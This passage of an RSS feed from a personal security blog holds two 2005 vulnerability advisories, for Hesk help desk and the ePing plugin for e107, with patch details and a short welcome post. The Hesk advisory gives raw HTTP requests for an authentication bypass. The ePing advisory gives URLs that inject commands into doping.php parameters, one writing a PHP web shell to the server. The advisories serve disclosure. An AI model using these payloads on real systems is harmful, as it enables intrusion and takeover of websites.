<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/6/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/6/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/6/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/6/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/6/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=6&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2006/01/11/mybloggie-sql-injectionprivilege-escalation-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>Hesk Session ID Validation Vulnerability</title>
		<link>http://rahulmohandas.wordpress.com/2006/01/11/hesk-session-id-validation-vulnerability/</link>
		<comments>http://rahulmohandas.wordpress.com/2006/01/11/hesk-session-id-validation-vulnerability/#comments</comments>
		<pubDate>Wed, 11 Jan 2006 20:32:46 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Vulnerability Research]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/hesk-session-id-validation-vulnerability/</guid>
		<description><![CDATA[OS2A ID: OS2A_1003 Status
9/13/2005 Issue Discovered
9/14/2005 Reported to the vendor
9/18/2005 Patch Released
9/20/2005 Advisory Released
Class: Authentication Bypass Severity: CRITICAL
Overview:
Hesk is a PHP based help desk software that runs with a MySQL database.
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path
disclosure vulnerabilities caused [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=5&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>OS2A ID: OS2A_1003 Status<br />
9/13/2005 Issue Discovered<br />
9/14/2005 Reported to the vendor<br />
9/18/2005 Patch Released<br />
9/20/2005 Advisory Released</p>
<p>Class: Authentication Bypass Severity: CRITICAL</p>
<p>Overview:<br />
Hesk is a PHP based help desk software that runs with a MySQL database.<br />
It allows to setup a ticket based support system (helpdesk) for websites.<br />
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path<br />
disclosure vulnerabilities caused due to improper validation of the HTTP<br />
header. This vulnerability can be exploited to bypass authentication<br />
mechanism, and also made to reveal system specific information.</p>
<p>Description:<br />
Multiple vulnerabilities exist in Hesk ticket based support system.</p>
<p>1. Authentication Bypass<br />
The &#8216;PHPSESSID&#8217;, Session ID parameter in the HTTP header is not properly<br />
validated. A malicious user can log in to the Administrator account by<br />
sending a random value to &#8216;PHPSESSID&#8217; parameter and posting it to<br />
admin.php. This Session ID can then be utilized to access administrative<br />
control panel.</p>
<p>This is similar to a previously reported vulnerability where invalid<br />
User ID and Password were submitted. In this case, a randomly chosen<br />
Session ID is sent along with the login request.</p>
<p>2. Path Disclosure.<br />
Path information can be made to disclose in error pages by passing invalid<br />
metacharacters such as &#8220;&#8216;&#8221; or &#8220;&lt;&#8221; to &#8216;PHPSESSID&#8217; field of the HTTP header.</p>
<p>Impact:<br />
Successful exploitation can result in a compromise of the application,<br />
disclosure of system specific information.</p>
<p>Affected Systems:<br />
Hesk 0.93 and prior.<br />
Linux (Any), Unix (Any), Windows (Any)</p>
<p>Exploit:<br />
1. HTTP POST request with randomly chosen Session ID:<br />
POST admin.php +<br />
(&#8220;Host: host_ip<br />
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip,deflate<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Connection: keep-alive<br />
Referer: http://host_ip/hesk/admin.php<br />
Cookie: PHPSESSID=12345<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 26<br />
user=1&amp;pass=sdfd&amp;a=do_login&#8221;);</p>
<p>2. GET request to administrative control panel:<br />
GET admin_main.php +<br />
(&#8220;Host: host_ip<br />
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip,deflate<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Connection: keep-alive<br />
Cookie: PHPSESSID=12345&#8243;)<br />
Solution:<br />
Patch:<br />
<a href="http://www.phpjunkyard.com/extras/hesk_0931_patch.zip" target="_blank">http://www.phpjunkyard.com/extras/hesk_0931_patch.zip</a><br />
OR Hesk 0.93.1 from<br />
<a href="http://www.phpjunkyard.com/free-helpdesk-software.php" target="_blank">http://www.phpjunkyard.com/free-helpdesk-software.php</a></p>
<p>Reference:</p>
<p><a href="http://seclists.org/bugtraq/2005/Sep/0242.html" target="_blank">http://seclists.org/bugtraq/2005/Sep/0242.html</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/5/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/5/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=5&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2006/01/11/hesk-session-id-validation-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>ePing Arbitrary File CreationCommand Execution Vulnerability</title>
		<link>http://rahulmohandas.wordpress.com/2006/01/11/eping-arbitrary-file-creationcommand-execution-vulnerability/</link>
		<comments>http://rahulmohandas.wordpress.com/2006/01/11/eping-arbitrary-file-creationcommand-execution-vulnerability/#comments</comments>
		<pubDate>Wed, 11 Jan 2006 20:27:01 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[Exploits]]></category>
		<category><![CDATA[Vulnerability Research]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/eping-arbitrary-file-creationcommand-execution-vulnerability/</guid>
		<description><![CDATA[OS2A ID: OS2A_1001    Status      Published: 08/04/2005
Updated  : 08/05/2005
Patch Released
Class: File Creation/Command Execution
Severity: CRITICAL
Overview:
ePing is a ping utility plugin for e107, a PHP-based content
management system that uses a MySQL backend database. ePing
versions 1.02 and prior are vulnerable to a file creation
vulnerability caused by improper validation of user-supplied
input [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=4&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>OS2A ID: OS2A_1001    Status      Published: 08/04/2005<br />
Updated  : 08/05/2005<br />
Patch Released</p>
<p>Class: File Creation/Command Execution<br />
Severity: CRITICAL</p>
<p>Overview:<br />
ePing is a ping utility plugin for e107, a PHP-based content<br />
management system that uses a MySQL backend database. ePing<br />
versions 1.02 and prior are vulnerable to a file creation<br />
vulnerability caused by improper validation of user-supplied<br />
input in the doping.php script. A remote attacker exploiting<br />
this vulnerability could then create an arbitrary file in the<br />
webserver, pipe multiple system commands in the eping_host<br />
or the eping_count parameters of the doping.php script, which<br />
would be executed within the security context of the hosting<br />
site.</p>
<p>eTrace, another utility plugin for e107 has similar<br />
vulnerabilities.</p>
<p>Description:<br />
e107 portal&#8217;s eping plugin 1.02 and prior is prone to remote<br />
command execution vulnerability. This vulnerability exists<br />
due to output redirection operators like &#8216;&gt;&#8217;, &#8216;|&#8217;, &#8216;&amp;&#8217; are<br />
not being sanitized in eping_host,eping_count parameters in<br />
the doping.php script.</p>
<p>eping_host has a validate function in functions.php which does<br />
not consider the above mentioned case.</p>
<p>eping_count has no validation logic. It accepts the above<br />
mentioned system meaningful characters.</p>
<p>Impact:<br />
A remote user can execute any command using &#8216;|&#8217; character or<br />
create a file with malicious executable code with &#8216;&gt;&#8217; character.<br />
Execution of arbitrary command or creation of arbitrary files<br />
can lead to, Denial of service, Disclosure or modification of<br />
system information or Execution of arbitrary code.</p>
<p>Affected Systems:<br />
ePing version 1.02 and prior<br />
Linux (Any), Unix (Any), Windows (Any)</p>
<p>Exploit:</p>
<p>a.<br />
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping<br />
%20-n&amp;eping_host=127.0.0.1&amp;eping_count=2%20%22%3C?php%20system(%94cmd<br />
.exe%94)?%3E%22%20%3Etest.php</p>
<p>b.<br />
http://example.com/e107/e107_plugins/eping/doping.php?eping_cmd=ping<br />
%20-n&amp;eping_host=127.0.0.1&amp;eping_count=2|dir</p>
<p>Solution:<br />
Patch:<br />
Upgrade to the version 1.03 of ePing and eTrace plugins.</p>
<p>Reference:<br />
<a href="http://marc.theaimsgroup.com/?l=bugtraq&amp;m=112328161319148&amp;w=2" target="_blank"> http://marc.theaimsgroup.com/?l=bugtraq&amp;m=112328161319148&amp;w=2</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/4/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/4/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/4/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=4&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2006/01/11/eping-arbitrary-file-creationcommand-execution-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
		<item>
		<title>My Blog</title>
		<link>http://rahulmohandas.wordpress.com/2006/01/11/my-blog/</link>
		<comments>http://rahulmohandas.wordpress.com/2006/01/11/my-blog/#comments</comments>
		<pubDate>Wed, 11 Jan 2006 20:09:08 +0000</pubDate>
		<dc:creator>rahulmohandas</dc:creator>
				<category><![CDATA[General Chatter]]></category>

		<guid isPermaLink="false">http://rahulmohandas.wordpress.com/2007/10/13/my-blog/</guid>
		<description><![CDATA[Welcome to my blog,  guys !!!
This blog is a renovation of http://rahulmohandas.blogspot.com, its here to keep track of my interests in the security space&#8230;
Have a nice time&#8230;.
Disclaimer: This is a personal blog written, edited, and published by and reflects the personal views of me, in my individual capacity. The views and opinions expressed here [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=3&subd=rahulmohandas&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Welcome to my blog,  guys !!!</p>
<p>This blog is a renovation of http://rahulmohandas.blogspot.com, its here to keep track of my interests in the security space&#8230;</p>
<p>Have a nice time&#8230;.</p>
<p><strong>Disclaimer:</strong> This is a personal blog written, edited, and published by and reflects the personal views of me, in my individual capacity. The views and opinions expressed here represent my own and not those of the people, institutions, or organizations that I may or may not be related with, unless stated explicitly.</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/rahulmohandas.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/rahulmohandas.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/rahulmohandas.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/rahulmohandas.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/rahulmohandas.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/rahulmohandas.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/rahulmohandas.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/rahulmohandas.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/rahulmohandas.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/rahulmohandas.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/rahulmohandas.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/rahulmohandas.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=rahulmohandas.wordpress.com&blog=1903595&post=3&subd=rahulmohandas&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://rahulmohandas.wordpress.com/2006/01/11/my-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/5877b4db349955606446a3f2d4920777?s=96&#38;d=identicon" medium="image">
			<media:title type="html">rahulmohandas</media:title>
		</media:content>
	</item>
	</channel>
</rss>